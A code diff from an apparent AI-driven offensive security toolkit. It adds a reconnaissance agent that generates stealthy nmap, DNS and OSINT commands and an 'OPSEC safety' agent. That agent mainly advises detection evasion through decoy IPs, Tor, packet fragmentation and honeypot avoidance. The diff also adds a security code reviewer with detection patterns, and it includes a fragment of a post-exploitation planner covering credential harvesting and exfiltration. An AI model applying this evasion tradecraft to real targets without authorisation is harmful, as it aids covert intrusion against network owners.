        "risk_assessment": response.risk_assessment,
    }

    if args.output:
        with open(args.output, 'w') as f:
            json.dump(result, f, indent=2)
        print(f"Post-exploitation plan saved to {args.output}")
    else:
        print(json.dumps(result, indent=2))
agent.execute_post_exploitation(request) + + # Output results + result = { + "target": args.target, + "credential_harvest": response.credential_harvest, + "lateral_movement": response.lateral_movement, + "persistence": response.persistence, + "exfiltration": response.exfiltration, + "command_sequence": response.command_sequence, + "risk_assessment": response.risk_assessment + } + + if args.output: + with open(args.output, 'w') as f: + json.dump(result, f, indent=2) + print(f"Post-exploitation plan saved to {args.output}") + else: + print(json.dumps(result, indent=2)) + +if __name__ == "__main__": + main() diff --git a/src/agents/recon_agent.py b/src/agents/recon_agent.py new file mode 100644 index 0000000000000000000000000000000000000000..8a3c7b09c96b21f79b3c423702baf8a8d904bb84 --- /dev/null +++ b/src/agents/recon_agent.py @@ -0,0 +1,353 @@ +""" +ReconAgent: Cybersecurity Reconnaissance Agent +Performs stealth reconnaissance and information gathering operations. +""" + +import json +import logging +from typing import Dict, List, Optional, Any +from dataclasses import dataclass +from pathlib import Path + +# HUMAN_APPROVAL_REQUIRED: Review reconnaissance strategies before execution + +@dataclass +class ReconTarget: + """Target information for reconnaissance operations.""" + target: str + target_type: str # 'domain', 'ip', 'network', 'organization' + constraints: Dict[str, Any] + opsec_level: str = 'medium' # 'low', 'medium', 'high', 'maximum' + +@dataclass +class ReconResult: + """Results from reconnaissance operations.""" + target: str + commands: Dict[str, List[str]] + passive_techniques: List[str] + opsec_notes: List[str] + risk_assessment: str + next_steps: List[str] + +class ReconAgent: + """Advanced reconnaissance agent with OPSEC awareness.""" + + def __init__(self, config_path: Optional[Path] = None): + self.logger = logging.getLogger(__name__) + self.config = self._load_config(config_path) + self.opsec_profiles = self._load_opsec_profiles() + + def 
_load_config(self, config_path: Optional[Path]) -> Dict: + """Load agent configuration.""" + default_config = { + 'max_scan_ports': 1000, + 'scan_timing': 'T3', # Normal timing + 'stealth_mode': True, + 'passive_only': False, + 'shodan_api_key': None, + 'censys_api_key': None + } + + if config_path and config_path.exists(): + with open(config_path, 'r') as f: + user_config = json.load(f) + default_config.update(user_config) + + return default_config + + def _load_opsec_profiles(self) -> Dict: + """Load OPSEC profiles for different stealth levels.""" + return { + 'low': { + 'timing': 'T4', + 'port_limit': 65535, + 'techniques': ['tcp_connect', 'udp_scan', 'service_detection'], + 'delay_between_scans': 0 + }, + 'medium': { + 'timing': 'T3', + 'port_limit': 1000, + 'techniques': ['syn_scan', 'service_detection'], + 'delay_between_scans': 1 + }, + 'high': { + 'timing': 'T2', + 'port_limit': 100, + 'techniques': ['syn_scan'], + 'delay_between_scans': 5 + }, + 'maximum': { + 'timing': 'T1', + 'port_limit': 22, # Common ports only + 'techniques': ['passive_only'], + 'delay_between_scans': 30 + } + } + + def analyze_target(self, target_info: ReconTarget) -> ReconResult: + """ + Analyze target and generate reconnaissance strategy. 
+ + HUMAN_APPROVAL_REQUIRED: Review target analysis before proceeding + """ + self.logger.info(f"Analyzing target: {target_info.target}") + + # Get OPSEC profile + opsec_profile = self.opsec_profiles.get(target_info.opsec_level, self.opsec_profiles['medium']) + + # Generate reconnaissance commands + commands = { + 'nmap': self._generate_nmap_commands(target_info, opsec_profile), + 'passive_dns': self._generate_passive_dns_commands(target_info), + 'osint': self._generate_osint_commands(target_info), + 'shodan': self._generate_shodan_queries(target_info) + } + + # Generate passive techniques + passive_techniques = self._generate_passive_techniques(target_info) + + # OPSEC considerations + opsec_notes = self._generate_opsec_notes(target_info, opsec_profile) + + # Risk assessment + risk_assessment = self._assess_reconnaissance_risk(target_info, commands) + + # Next steps + next_steps = self._suggest_next_steps(target_info, commands) + + return ReconResult( + target=target_info.target, + commands=commands, + passive_techniques=passive_techniques, + opsec_notes=opsec_notes, + risk_assessment=risk_assessment, + next_steps=next_steps + ) + + def _generate_nmap_commands(self, target: ReconTarget, opsec_profile: Dict) -> List[str]: + """Generate OPSEC-aware Nmap commands.""" + commands = [] + timing = opsec_profile['timing'] + port_limit = min(opsec_profile['port_limit'], self.config['max_scan_ports']) + + if 'passive_only' in opsec_profile['techniques']: + return [] # No active scanning for maximum stealth + + # Host discovery + if target.opsec_level in ['low', 'medium']: + commands.append(f"nmap -sn {target.target}") + + # Port scanning + if 'syn_scan' in opsec_profile['techniques']: + commands.append(f"nmap -sS -{timing} --top-ports {port_limit} {target.target}") + elif 'tcp_connect' in opsec_profile['techniques']: + commands.append(f"nmap -sT -{timing} --top-ports {port_limit} {target.target}") + + # Service detection (careful with stealth) + if 'service_detection' in 
opsec_profile['techniques'] and target.opsec_level != 'high': + commands.append(f"nmap -sV -{timing} --version-intensity 2 {target.target}") + + # OS detection (only for low OPSEC) + if target.opsec_level == 'low': + commands.append(f"nmap -O -{timing} {target.target}") + + # Add stealth flags + for i, cmd in enumerate(commands): + if target.opsec_level in ['high', 'maximum']: + commands[i] += " -f --scan-delay 1000ms" # Fragment packets, add delay + + return commands + + def _generate_passive_dns_commands(self, target: ReconTarget) -> List[str]: + """Generate passive DNS reconnaissance commands.""" + commands = [] + + if target.target_type == 'domain': + commands.extend([ + f"dig {target.target} ANY", + f"dig {target.target} TXT", + f"dig {target.target} MX", + f"dig {target.target} NS", + f"whois {target.target}", + f"curl -s 'https://crt.sh/?q={target.target}&output=json'" + ]) + + return commands + + def _generate_osint_commands(self, target: ReconTarget) -> List[str]: + """Generate OSINT gathering commands.""" + commands = [] + + if target.target_type in ['domain', 'organization']: + commands.extend([ + f"theharvester -d {target.target} -b google,bing,linkedin", + f"amass enum -d {target.target}", + f"subfinder -d {target.target}", + f"curl -s 'https://api.github.com/search/code?q={target.target}'" + ]) + + return commands + + def _generate_shodan_queries(self, target: ReconTarget) -> List[str]: + """Generate Shodan search queries.""" + if not self.config.get('shodan_api_key'): + return ["# Shodan API key not configured"] + + queries = [] + + if target.target_type == 'ip': + queries.append(f"host:{target.target}") + elif target.target_type == 'domain': + queries.extend([ + f"hostname:{target.target}", + f"ssl:{target.target}", + f"org:\"{target.target}\"" + ]) + elif target.target_type == 'organization': + queries.append(f"org:\"{target.target}\"") + + return queries + + def _generate_passive_techniques(self, target: ReconTarget) -> List[str]: + """Generate 
list of passive reconnaissance techniques.""" + techniques = [ + "Certificate Transparency log analysis", + "DNS cache snooping", + "BGP route analysis", + "Social media reconnaissance", + "Job posting analysis", + "Public document metadata extraction", + "Wayback Machine analysis", + "GitHub/GitLab repository search" + ] + + if target.target_type == 'organization': + techniques.extend([ + "LinkedIn employee enumeration", + "SEC filing analysis", + "Press release analysis", + "Conference presentation search" + ]) + + return techniques + + def _generate_opsec_notes(self, target: ReconTarget, opsec_profile: Dict) -> List[str]: + """Generate OPSEC considerations and warnings.""" + notes = [] + + if target.opsec_level == 'maximum': + notes.extend([ + "MAXIMUM STEALTH: Use only passive techniques", + "Consider using Tor or VPN for all queries", + "Spread reconnaissance over multiple days", + "Use different source IPs for different queries" + ]) + elif target.opsec_level == 'high': + notes.extend([ + "HIGH STEALTH: Minimize active scanning", + "Use packet fragmentation and timing delays", + "Consider using decoy IPs", + "Monitor for defensive responses" + ]) + elif target.opsec_level == 'medium': + notes.extend([ + "MEDIUM STEALTH: Balance speed and stealth", + "Use moderate timing delays", + "Avoid aggressive service detection" + ]) + else: # low + notes.extend([ + "LOW STEALTH: Speed prioritized over stealth", + "Full port ranges and service detection enabled", + "Monitor logs for potential detection" + ]) + + # General OPSEC notes + notes.extend([ + "Log all reconnaissance activities", + "Use legitimate-looking User-Agent strings", + "Vary timing between different techniques", + "Document any anomalous responses" + ]) + + return notes + + def _assess_reconnaissance_risk(self, target: ReconTarget, commands: Dict) -> str: + """Assess the risk level of the reconnaissance plan.""" + risk_factors = [] + + # Count active scanning commands + active_commands = 
len(commands.get('nmap', [])) + if active_commands > 5: + risk_factors.append("High number of active scans") + + # Check OPSEC level vs techniques + if target.opsec_level == 'maximum' and active_commands > 0: + risk_factors.append("Active scanning conflicts with maximum stealth requirement") + + # Check for aggressive techniques + nmap_commands = ' '.join(commands.get('nmap', [])) + if '-A' in nmap_commands or '--script' in nmap_commands: + risk_factors.append("Aggressive scanning techniques detected") + + if not risk_factors: + return "LOW: Reconnaissance plan follows OPSEC guidelines" + elif len(risk_factors) <= 2: + return f"MEDIUM: Consider addressing: {'; '.join(risk_factors)}" + else: + return f"HIGH: Multiple risk factors identified: {'; '.join(risk_factors)}" + + def _suggest_next_steps(self, target: ReconTarget, commands: Dict) -> List[str]: + """Suggest next steps based on reconnaissance results.""" + steps = [ + "Execute passive reconnaissance first", + "Analyze results for interesting services/ports", + "Proceed with active scanning if OPSEC allows", + "Document all findings in structured format", + "Identify potential attack vectors", + "Plan next phase based on discovered services" + ] + + if target.opsec_level in ['high', 'maximum']: + steps.insert(1, "Wait 24-48 hours between reconnaissance phases") + + return steps + + def execute_reconnaissance(self, target_info: ReconTarget) -> Dict: + """ + Execute reconnaissance plan (simulation/planning mode). 
+ + HUMAN_APPROVAL_REQUIRED: Manual execution required for actual scanning + """ + self.logger.warning("SIMULATION MODE: Actual command execution disabled for safety") + + recon_result = self.analyze_target(target_info) + + # Return structured results for logging/analysis + return { + 'target': target_info.target, + 'opsec_level': target_info.opsec_level, + 'plan': recon_result.__dict__, + 'execution_status': 'SIMULATION_ONLY', + 'timestamp': str(Path().cwd()) + } + +# Example usage and testing +if __name__ == "__main__": + # Configure logging + logging.basicConfig(level=logging.INFO) + + # Initialize agent + agent = ReconAgent() + + # Example target + target = ReconTarget( + target="example.com", + target_type="domain", + constraints={"time_limit": "2h", "stealth": True}, + opsec_level="high" + ) + + # Analyze target + result = agent.execute_reconnaissance(target) + print(json.dumps(result, indent=2)) diff --git a/src/agents/safety_agent.py b/src/agents/safety_agent.py new file mode 100644 index 0000000000000000000000000000000000000000..211981c47efefa5067310f42bea79137dd14314f --- /dev/null +++ b/src/agents/safety_agent.py @@ -0,0 +1,526 @@ +""" +SafetyAgent: OPSEC Compliance and Safety Validation Agent +Validates operations for OPSEC compliance and safety considerations. 
+""" + +import json +import logging +import re +from typing import Dict, List, Optional, Any, Tuple +from dataclasses import dataclass +from pathlib import Path +from enum import Enum + +class RiskLevel(Enum): + LOW = "low" + MEDIUM = "medium" + HIGH = "high" + CRITICAL = "critical" + +@dataclass +class SafetyCheck: + """Safety check result.""" + check_name: str + risk_level: RiskLevel + description: str + violations: List[str] + recommendations: List[str] + +@dataclass +class SafetyAssessment: + """Complete safety assessment result.""" + overall_risk: RiskLevel + checks: List[SafetyCheck] + approved: bool + summary: str + safe_alternatives: List[str] + +class SafetyAgent: + """Advanced safety and OPSEC compliance validation agent.""" + + def __init__(self, config_path: Optional[Path] = None): + self.logger = logging.getLogger(__name__) + self.config = self._load_config(config_path) + self.opsec_rules = self._load_opsec_rules() + self.risk_patterns = self._load_risk_patterns() + + def _load_config(self, config_path: Optional[Path]) -> Dict: + """Load safety agent configuration.""" + default_config = { + 'strict_mode': True, + 'auto_approve_low_risk': False, + 'require_human_approval': ['high', 'critical'], + 'logging_level': 'INFO', + 'detection_threshold': 0.7 + } + + if config_path and config_path.exists(): + with open(config_path, 'r') as f: + user_config = json.load(f) + default_config.update(user_config) + + return default_config + + def _load_opsec_rules(self) -> Dict: + """Load OPSEC rules and best practices.""" + return { + 'timing_rules': { + 'max_requests_per_minute': 10, + 'min_delay_between_scans': 1000, # milliseconds + 'avoid_business_hours': True, + 'spread_over_days': ['high', 'maximum'] + }, + 'stealth_rules': { + 'use_decoy_ips': ['high', 'maximum'], + 'fragment_packets': ['medium', 'high', 'maximum'], + 'randomize_source_ports': True, + 'avoid_default_timing': ['medium', 'high', 'maximum'] + }, + 'target_rules': { + 'avoid_honeypots': True, + 
'check_threat_intelligence': True, + 'respect_robots_txt': True, + 'avoid_government_domains': True + }, + 'operational_rules': { + 'log_all_activities': True, + 'use_vpn_tor': ['high', 'maximum'], + 'rotate_infrastructure': ['high', 'maximum'], + 'monitor_defensive_responses': True + } + } + + def _load_risk_patterns(self) -> Dict: + """Load patterns that indicate high-risk activities.""" + return { + 'high_detection_commands': [ + r'-A\b', # Aggressive scan + r'--script.*vuln', # Vulnerability scripts + r'-sU.*-sS', # UDP + SYN scan combination + r'--top-ports\s+(\d+)', # High port count + r'-T[45]', # Aggressive timing + r'--min-rate\s+\d{3,}', # High rate scanning + r'nikto', # Web vulnerability scanner + r'sqlmap', # SQL injection tool + r'hydra', # Brute force tool + r'john', # Password cracker + r'hashcat' # Password cracker + ], + 'opsec_violations': [ + r'--reason', # Custom scan reason (logging risk) + r'-v{2,}', # High verbosity + r'--packet-trace', # Packet tracing + r'--traceroute', # Network path disclosure + r'-sn.*--traceroute', # Ping sweep with traceroute + r'--source-port\s+53', # DNS source port spoofing + r'--data-string', # Custom data (potential signature) + ], + 'infrastructure_risks': [ + r'shodan.*api', # Shodan API usage + r'censys.*search', # Censys API usage + r'virustotal', # VirusTotal queries + r'threatcrowd', # Threat intelligence queries + r'passivetotal' # PassiveTotal queries + ], + 'time_sensitive': [ + r'while.*true', # Infinite loops + r'for.*in.*range\(\s*\d{3,}', # Large iterations + r'sleep\s+[0-9]*[.][0-9]+', # Very short delays + r'--max-rate', # Rate limiting bypass + ] + } + + def validate_commands(self, commands: Dict[str, List[str]], opsec_level: str = 'medium') -> SafetyAssessment: + """ + Validate a set of commands for OPSEC compliance and safety. 
+ + Args: + commands: Dictionary of command categories and command lists + opsec_level: Required OPSEC level ('low', 'medium', 'high', 'maximum') + + Returns: + SafetyAssessment with validation results + """ + self.logger.info(f"Validating commands for OPSEC level: {opsec_level}") + + checks = [] + + # Perform individual safety checks + checks.append(self._check_detection_risk(commands)) + checks.append(self._check_opsec_compliance(commands, opsec_level)) + checks.append(self._check_timing_compliance(commands, opsec_level)) + checks.append(self._check_infrastructure_safety(commands)) + checks.append(self._check_target_appropriateness(commands)) + + # Calculate overall risk + overall_risk = self._calculate_overall_risk(checks) + + # Determine approval status + approved = self._determine_approval(overall_risk, opsec_level) + + # Generate summary + summary = self._generate_summary(checks, overall_risk, approved) + + # Generate safe alternatives if not approved + safe_alternatives = [] + if not approved: + safe_alternatives = self._generate_safe_alternatives(commands, opsec_level) + + return SafetyAssessment( + overall_risk=overall_risk, + checks=checks, + approved=approved, + summary=summary, + safe_alternatives=safe_alternatives + ) + + def _check_detection_risk(self, commands: Dict[str, List[str]]) -> SafetyCheck: + """Check for commands with high detection risk.""" + violations = [] + recommendations = [] + + all_commands = [] + for cmd_list in commands.values(): + all_commands.extend(cmd_list) + + command_text = ' '.join(all_commands) + + for pattern in self.risk_patterns['high_detection_commands']: + matches = re.findall(pattern, command_text, re.IGNORECASE) + if matches: + violations.append(f"High-detection pattern found: {pattern}") + + # Check for aggressive scanning combinations + if '-sS' in command_text and '-sV' in command_text: + violations.append("Aggressive scanning combination: SYN scan + service detection") + + if len(violations) == 0: + risk_level = 
RiskLevel.LOW + description = "No high-detection risk patterns found" + elif len(violations) <= 2: + risk_level = RiskLevel.MEDIUM + description = "Some detection risk patterns identified" + recommendations.extend([ + "Consider using stealth timing (-T1 or -T2)", + "Add packet fragmentation (-f)", + "Implement delays between scans" + ]) + else: + risk_level = RiskLevel.HIGH + description = "Multiple high-detection risk patterns found" + recommendations.extend([ + "Significantly reduce scanning aggressiveness", + "Use passive techniques where possible", + "Implement substantial delays", + "Consider using decoy IPs" + ]) + + return SafetyCheck( + check_name="Detection Risk Analysis", + risk_level=risk_level, + description=description, + violations=violations, + recommendations=recommendations + ) + + def _check_opsec_compliance(self, commands: Dict[str, List[str]], opsec_level: str) -> SafetyCheck: + """Check OPSEC compliance based on required level.""" + violations = [] + recommendations = [] + + all_commands = ' '.join([' '.join(cmd_list) for cmd_list in commands.values()]) + + # Check stealth requirements + stealth_rules = self.opsec_rules['stealth_rules'] + + if opsec_level in ['medium', 'high', 'maximum'] and '-T4' in all_commands: + violations.append("Aggressive timing (-T4) conflicts with stealth requirements") + + if opsec_level in ['high', 'maximum'] and not any('-f' in cmd for cmd_list in commands.values() for cmd in cmd_list): + violations.append("Packet fragmentation (-f) recommended for high stealth") + + if opsec_level == 'maximum' and any('nmap' in cmd for cmd_list in commands.values() for cmd in cmd_list): + violations.append("Active scanning not recommended for maximum stealth") + + # Check for OPSEC violation patterns + for pattern in self.risk_patterns['opsec_violations']: + if re.search(pattern, all_commands, re.IGNORECASE): + violations.append(f"OPSEC violation pattern: {pattern}") + + # Determine risk level + if len(violations) == 0: + 
risk_level = RiskLevel.LOW + description = f"Commands comply with {opsec_level} OPSEC requirements" + elif len(violations) <= 2: + risk_level = RiskLevel.MEDIUM + description = f"Minor OPSEC compliance issues for {opsec_level} level" + else: + risk_level = RiskLevel.HIGH + description = f"Significant OPSEC violations for {opsec_level} level" + + # Generate recommendations based on OPSEC level + if opsec_level == 'maximum': + recommendations.extend([ + "Use only passive reconnaissance techniques", + "Employ Tor or VPN for all queries", + "Spread activities over multiple days" + ]) + elif opsec_level == 'high': + recommendations.extend([ + "Use stealth timing (-T1 or -T2)", + "Implement packet fragmentation", + "Add significant delays between operations" + ]) + + return SafetyCheck( + check_name="OPSEC Compliance", + risk_level=risk_level, + description=description, + violations=violations, + recommendations=recommendations + ) + + def _check_timing_compliance(self, commands: Dict[str, List[str]], opsec_level: str) -> SafetyCheck: + """Check timing and rate limiting compliance.""" + violations = [] + recommendations = [] + + all_commands = ' '.join([' '.join(cmd_list) for cmd_list in commands.values()]) + + # Check for timing violations + timing_rules = self.opsec_rules['timing_rules'] + + # Check for aggressive timing + aggressive_timing = re.findall(r'-T([45])', all_commands) + if aggressive_timing and opsec_level in ['medium', 'high', 'maximum']: + violations.append(f"Aggressive timing (-T{'/'.join(aggressive_timing)}) violates {opsec_level} OPSEC") + + # Check for high rate scanning + rate_matches = re.findall(r'--min-rate\s+(\d+)', all_commands) + if rate_matches: + for rate in rate_matches: + if int(rate) > 100 and opsec_level in ['high', 'maximum']: + violations.append(f"High scan rate ({rate}) not suitable for {opsec_level} OPSEC") + + # Check for insufficient delays + delay_matches = re.findall(r'--scan-delay\s+(\d+)', all_commands) + if opsec_level in 
['high', 'maximum'] and not delay_matches: + violations.append("Scan delays not specified for high stealth requirement") + + risk_level = RiskLevel.LOW if len(violations) == 0 else ( + RiskLevel.MEDIUM if len(violations) <= 2 else RiskLevel.HIGH + ) + + if risk_level != RiskLevel.LOW: + recommendations.extend([ + "Implement appropriate scan timing for OPSEC level", + "Add delays between scan phases", + "Consider spreading scans over longer time periods" + ]) + + return SafetyCheck( + check_name="Timing Compliance", + risk_level=risk_level, + description=f"Timing analysis for {opsec_level} OPSEC level", + violations=violations, + recommendations=recommendations + ) + + def _check_infrastructure_safety(self, commands: Dict[str, List[str]]) -> SafetyCheck: + """Check for infrastructure and API safety.""" + violations = [] + recommendations = [] + + all_commands = ' '.join([' '.join(cmd_list) for cmd_list in commands.values()]) + + # Check for infrastructure risks + for pattern in self.risk_patterns['infrastructure_risks']: + if re.search(pattern, all_commands, re.IGNORECASE): + violations.append(f"Infrastructure risk: {pattern}") + + # Check for API key exposure + if 'api' in all_commands.lower() and 'key' in all_commands.lower(): + violations.append("Potential API key exposure in commands") + + risk_level = RiskLevel.LOW if len(violations) == 0 else RiskLevel.MEDIUM + + if violations: + recommendations.extend([ + "Secure API keys using environment variables", + "Use VPN/proxy for external API queries", + "Monitor API usage quotas" + ]) + + return SafetyCheck( + check_name="Infrastructure Safety", + risk_level=risk_level, + description="Infrastructure and API safety analysis", + violations=violations, + recommendations=recommendations + ) + + def _check_target_appropriateness(self, commands: Dict[str, List[str]]) -> SafetyCheck: + """Check target appropriateness and legal considerations.""" + violations = [] + recommendations = [] + + # Extract targets from commands + 
targets = self._extract_targets_from_commands(commands) + + for target in targets: + # Check for government domains + if any(gov_tld in target.lower() for gov_tld in ['.gov', '.mil', '.fed']): + violations.append(f"Government domain detected: {target}") + + # Check for known honeypot indicators + if any(honeypot in target.lower() for honeypot in ['honeypot', 'canary', 'trap']): + violations.append(f"Potential honeypot detected: {target}") + + risk_level = RiskLevel.CRITICAL if any('.gov' in v or '.mil' in v for v in violations) else ( + RiskLevel.HIGH if violations else RiskLevel.LOW + ) + + if risk_level != RiskLevel.LOW: + recommendations.extend([ + "Verify authorization for all targets", + "Review legal implications", + "Consider using test environments" + ]) + + return SafetyCheck( + check_name="Target Appropriateness", + risk_level=risk_level, + description="Target selection and legal compliance", + violations=violations, + recommendations=recommendations + ) + + def _extract_targets_from_commands(self, commands: Dict[str, List[str]]) -> List[str]: + """Extract target IPs/domains from commands.""" + targets = [] + + for cmd_list in commands.values(): + for cmd in cmd_list: + # Simple regex to find IP addresses and domains + ip_pattern = r'\b(?:\d{1,3}\.){3}\d{1,3}\b' + domain_pattern = r'\b[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*\b' + + targets.extend(re.findall(ip_pattern, cmd)) + targets.extend(re.findall(domain_pattern, cmd)) + + return list(set(targets)) # Remove duplicates + + def _calculate_overall_risk(self, checks: List[SafetyCheck]) -> RiskLevel: + """Calculate overall risk level from individual checks.""" + risk_scores = { + RiskLevel.LOW: 1, + RiskLevel.MEDIUM: 2, + RiskLevel.HIGH: 3, + RiskLevel.CRITICAL: 4 + } + + max_risk = max(check.risk_level for check in checks) + avg_risk = sum(risk_scores[check.risk_level] for check in checks) / len(checks) + + # If any check is critical, overall is 
critical + if max_risk == RiskLevel.CRITICAL: + return RiskLevel.CRITICAL + + # If average risk is high, overall is high + if avg_risk >= 3.0: + return RiskLevel.HIGH + elif avg_risk >= 2.0: + return RiskLevel.MEDIUM + else: + return RiskLevel.LOW + + def _determine_approval(self, overall_risk: RiskLevel, opsec_level: str) -> bool: + """Determine if commands are approved based on risk and configuration.""" + if overall_risk == RiskLevel.CRITICAL: + return False + + if overall_risk == RiskLevel.HIGH and self.config['strict_mode']: + return False + + if overall_risk.value in self.config['require_human_approval']: + self.logger.warning(f"HUMAN APPROVAL REQUIRED for {overall_risk.value} risk level") + return False # Requires manual approval + + if overall_risk == RiskLevel.LOW and self.config['auto_approve_low_risk']: + return True + + return overall_risk in [RiskLevel.LOW, RiskLevel.MEDIUM] + + def _generate_summary(self, checks: List[SafetyCheck], overall_risk: RiskLevel, approved: bool) -> str: + """Generate a summary of the safety assessment.""" + violation_count = sum(len(check.violations) for check in checks) + + status = "APPROVED" if approved else "REJECTED" + + summary = f"Safety Assessment: {status}\n" + summary += f"Overall Risk Level: {overall_risk.value.upper()}\n" + summary += f"Total Violations: {violation_count}\n" + + if not approved: + summary += "\nREASONS FOR REJECTION:\n" + for check in checks: + if check.violations: + summary += f"- {check.check_name}: {len(check.violations)} violations\n" + + return summary + + def _generate_safe_alternatives(self, commands: Dict[str, List[str]], opsec_level: str) -> List[str]: + """Generate safer alternative commands.""" + alternatives = [] + + # General safer alternatives + alternatives.extend([ + "Use passive reconnaissance techniques first", + "Implement longer delays between scans (--scan-delay 2000ms)", + "Use stealth timing (-T1 or -T2)", + "Add packet fragmentation (-f)", + "Reduce port scan range 
(--top-ports 100)", + "Use decoy IPs (-D RND:10)" + ]) + + if opsec_level in ['high', 'maximum']: + alternatives.extend([ + "Consider using only passive techniques", + "Employ Tor/VPN for all reconnaissance", + "Spread activities over multiple days", + "Use different source IPs for different phases" + ]) + + return alternatives + +# Example usage and testing +if __name__ == "__main__": + # Configure logging + logging.basicConfig(level=logging.INFO) + + # Initialize safety agent + agent = SafetyAgent() + + # Example commands to validate + test_commands = { + 'nmap': [ + 'nmap -sS -T4 --top-ports 1000 example.com', + 'nmap -A -v example.com' + ], + 'passive': [ + 'dig example.com ANY', + 'whois example.com' + ] + } + + # Validate commands + assessment = agent.validate_commands(test_commands, opsec_level='high') + + print(f"Assessment: {assessment.approved}") + print(f"Overall Risk: {assessment.overall_risk.value}") + print(f"Summary:\n{assessment.summary}") + + if assessment.safe_alternatives: + print(f"\nSafe Alternatives:") + for alt in assessment.safe_alternatives: + print(f"- {alt}") diff --git a/src/analysis/code_reviewer.py b/src/analysis/code_reviewer.py new file mode 100644 index 0000000000000000000000000000000000000000..ba8d5276d513c54d19729a86809ee1999fb6df6e --- /dev/null +++ b/src/analysis/code_reviewer.py @@ -0,0 +1,1021 @@ +""" +Code Review and Analysis Suite for Cyber-LLM +Advanced static analysis, security review, and optimization identification + +Author: Muzan Sano +""" + +import ast +import re +import os +import json +import asyncio +import logging +from pathlib import Path +from typing import Dict, List, Any, Optional, Set, Tuple +from dataclasses import dataclass, field +from datetime import datetime +import subprocess +from collections import defaultdict, Counter + +# Security analysis imports +import bandit +from bandit.core.config import BanditConfig +from bandit.core.manager import BanditManager + +# Code quality imports +try: + import 
pylint.lint + import flake8.api.legacy as flake8 + from mypy import api as mypy_api +except ImportError: + print("Install code quality tools: pip install pylint flake8 mypy") + +@dataclass +class CodeIssue: + """Represents a code issue found during analysis""" + file_path: str + line_number: int + severity: str # critical, high, medium, low, info + issue_type: str # security, performance, maintainability, style, bug + description: str + recommendation: str + confidence: float = 1.0 + cwe_id: Optional[str] = None # Common Weakness Enumeration ID + +@dataclass +class ReviewResults: + """Complete code review results""" + total_files_analyzed: int + total_lines_analyzed: int + issues: List[CodeIssue] = field(default_factory=list) + metrics: Dict[str, Any] = field(default_factory=dict) + security_score: float = 0.0 + maintainability_score: float = 0.0 + performance_score: float = 0.0 + overall_score: float = 0.0 + +class SecurityAnalyzer: + """Advanced security analysis for cybersecurity applications""" + + def __init__(self): + self.logger = logging.getLogger("security_analyzer") + + # Custom security patterns for cybersecurity tools + self.security_patterns = { + "hardcoded_credentials": [ + r"password\s*=\s*['\"][^'\"]{3,}['\"]", + r"api_key\s*=\s*['\"][^'\"]{10,}['\"]", + r"secret\s*=\s*['\"][^'\"]{8,}['\"]", + r"token\s*=\s*['\"][^'\"]{16,}['\"]" + ], + "command_injection": [ + r"os\.system\s*\(", + r"subprocess\.call\s*\(", + r"subprocess\.run\s*\(", + r"eval\s*\(", + r"exec\s*\(" + ], + "sql_injection": [ + r"execute\s*\(\s*['\"].*%s.*['\"]", + r"cursor\.execute\s*\(\s*[f]?['\"].*\{.*\}.*['\"]" + ], + "path_traversal": [ + r"open\s*\(\s*.*\+.*\)", + r"file\s*\(\s*.*\+.*\)", + r"\.\./" + ], + "insecure_random": [ + r"random\.random\(\)", + r"random\.choice\(", + r"random\.randint\(" + ] + } + + async def analyze_security(self, file_paths: List[str]) -> List[CodeIssue]: + """Comprehensive security analysis""" + + security_issues = [] + + for file_path in 
file_paths: + if not file_path.endswith('.py'): + continue + + self.logger.info(f"Security analysis: {file_path}") + + try: + # Read file content + with open(file_path, 'r', encoding='utf-8') as f: + content = f.read() + + # Pattern-based security analysis + pattern_issues = await self._analyze_security_patterns(file_path, content) + security_issues.extend(pattern_issues) + + # AST-based security analysis + ast_issues = await self._analyze_ast_security(file_path, content) + security_issues.extend(ast_issues) + + # Bandit integration for comprehensive security scanning + bandit_issues = await self._run_bandit_analysis(file_path) + security_issues.extend(bandit_issues) + + except Exception as e: + self.logger.error(f"Error analyzing {file_path}: {str(e)}") + security_issues.append(CodeIssue( + file_path=file_path, + line_number=0, + severity="medium", + issue_type="security", + description=f"Analysis error: {str(e)}", + recommendation="Manual review required" + )) + + return security_issues + + async def _analyze_security_patterns(self, file_path: str, content: str) -> List[CodeIssue]: + """Pattern-based security vulnerability detection""" + + issues = [] + lines = content.split('\n') + + for category, patterns in self.security_patterns.items(): + for pattern in patterns: + for line_num, line in enumerate(lines, 1): + if re.search(pattern, line, re.IGNORECASE): + severity, recommendation = self._get_security_severity(category, line) + + issues.append(CodeIssue( + file_path=file_path, + line_number=line_num, + severity=severity, + issue_type="security", + description=f"Potential {category.replace('_', ' ')}: {line.strip()}", + recommendation=recommendation, + confidence=0.8 + )) + + return issues + + async def _analyze_ast_security(self, file_path: str, content: str) -> List[CodeIssue]: + """AST-based security analysis for complex patterns""" + + issues = [] + + try: + tree = ast.parse(content) + + class SecurityVisitor(ast.NodeVisitor): + def __init__(self): + 
self.issues = [] + + def visit_Call(self, node): + # Check for dangerous function calls + if isinstance(node.func, ast.Name): + func_name = node.func.id + + if func_name in ['eval', 'exec']: + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="critical", + issue_type="security", + description=f"Dangerous function call: {func_name}", + recommendation="Avoid using eval/exec, use safer alternatives", + cwe_id="CWE-94" + )) + + elif isinstance(node.func, ast.Attribute): + if (isinstance(node.func.value, ast.Name) and + node.func.value.id == 'os' and + node.func.attr == 'system'): + + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="high", + issue_type="security", + description="Command injection risk: os.system()", + recommendation="Use subprocess with shell=False", + cwe_id="CWE-78" + )) + + self.generic_visit(node) + + def visit_Import(self, node): + for alias in node.names: + if alias.name in ['pickle', 'cPickle']: + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="medium", + issue_type="security", + description="Insecure deserialization: pickle import", + recommendation="Use json or safer serialization methods", + cwe_id="CWE-502" + )) + + self.generic_visit(node) + + visitor = SecurityVisitor() + visitor.visit(tree) + issues.extend(visitor.issues) + + except SyntaxError as e: + issues.append(CodeIssue( + file_path=file_path, + line_number=e.lineno or 0, + severity="high", + issue_type="security", + description=f"Syntax error prevents security analysis: {str(e)}", + recommendation="Fix syntax errors before security analysis" + )) + + return issues + + async def _run_bandit_analysis(self, file_path: str) -> List[CodeIssue]: + """Run Bandit security scanner""" + + issues = [] + + try: + # Configure Bandit + config = BanditConfig() + manager = BanditManager(config, 'file') + manager.discover_files([file_path]) + manager.run_tests() + + # 
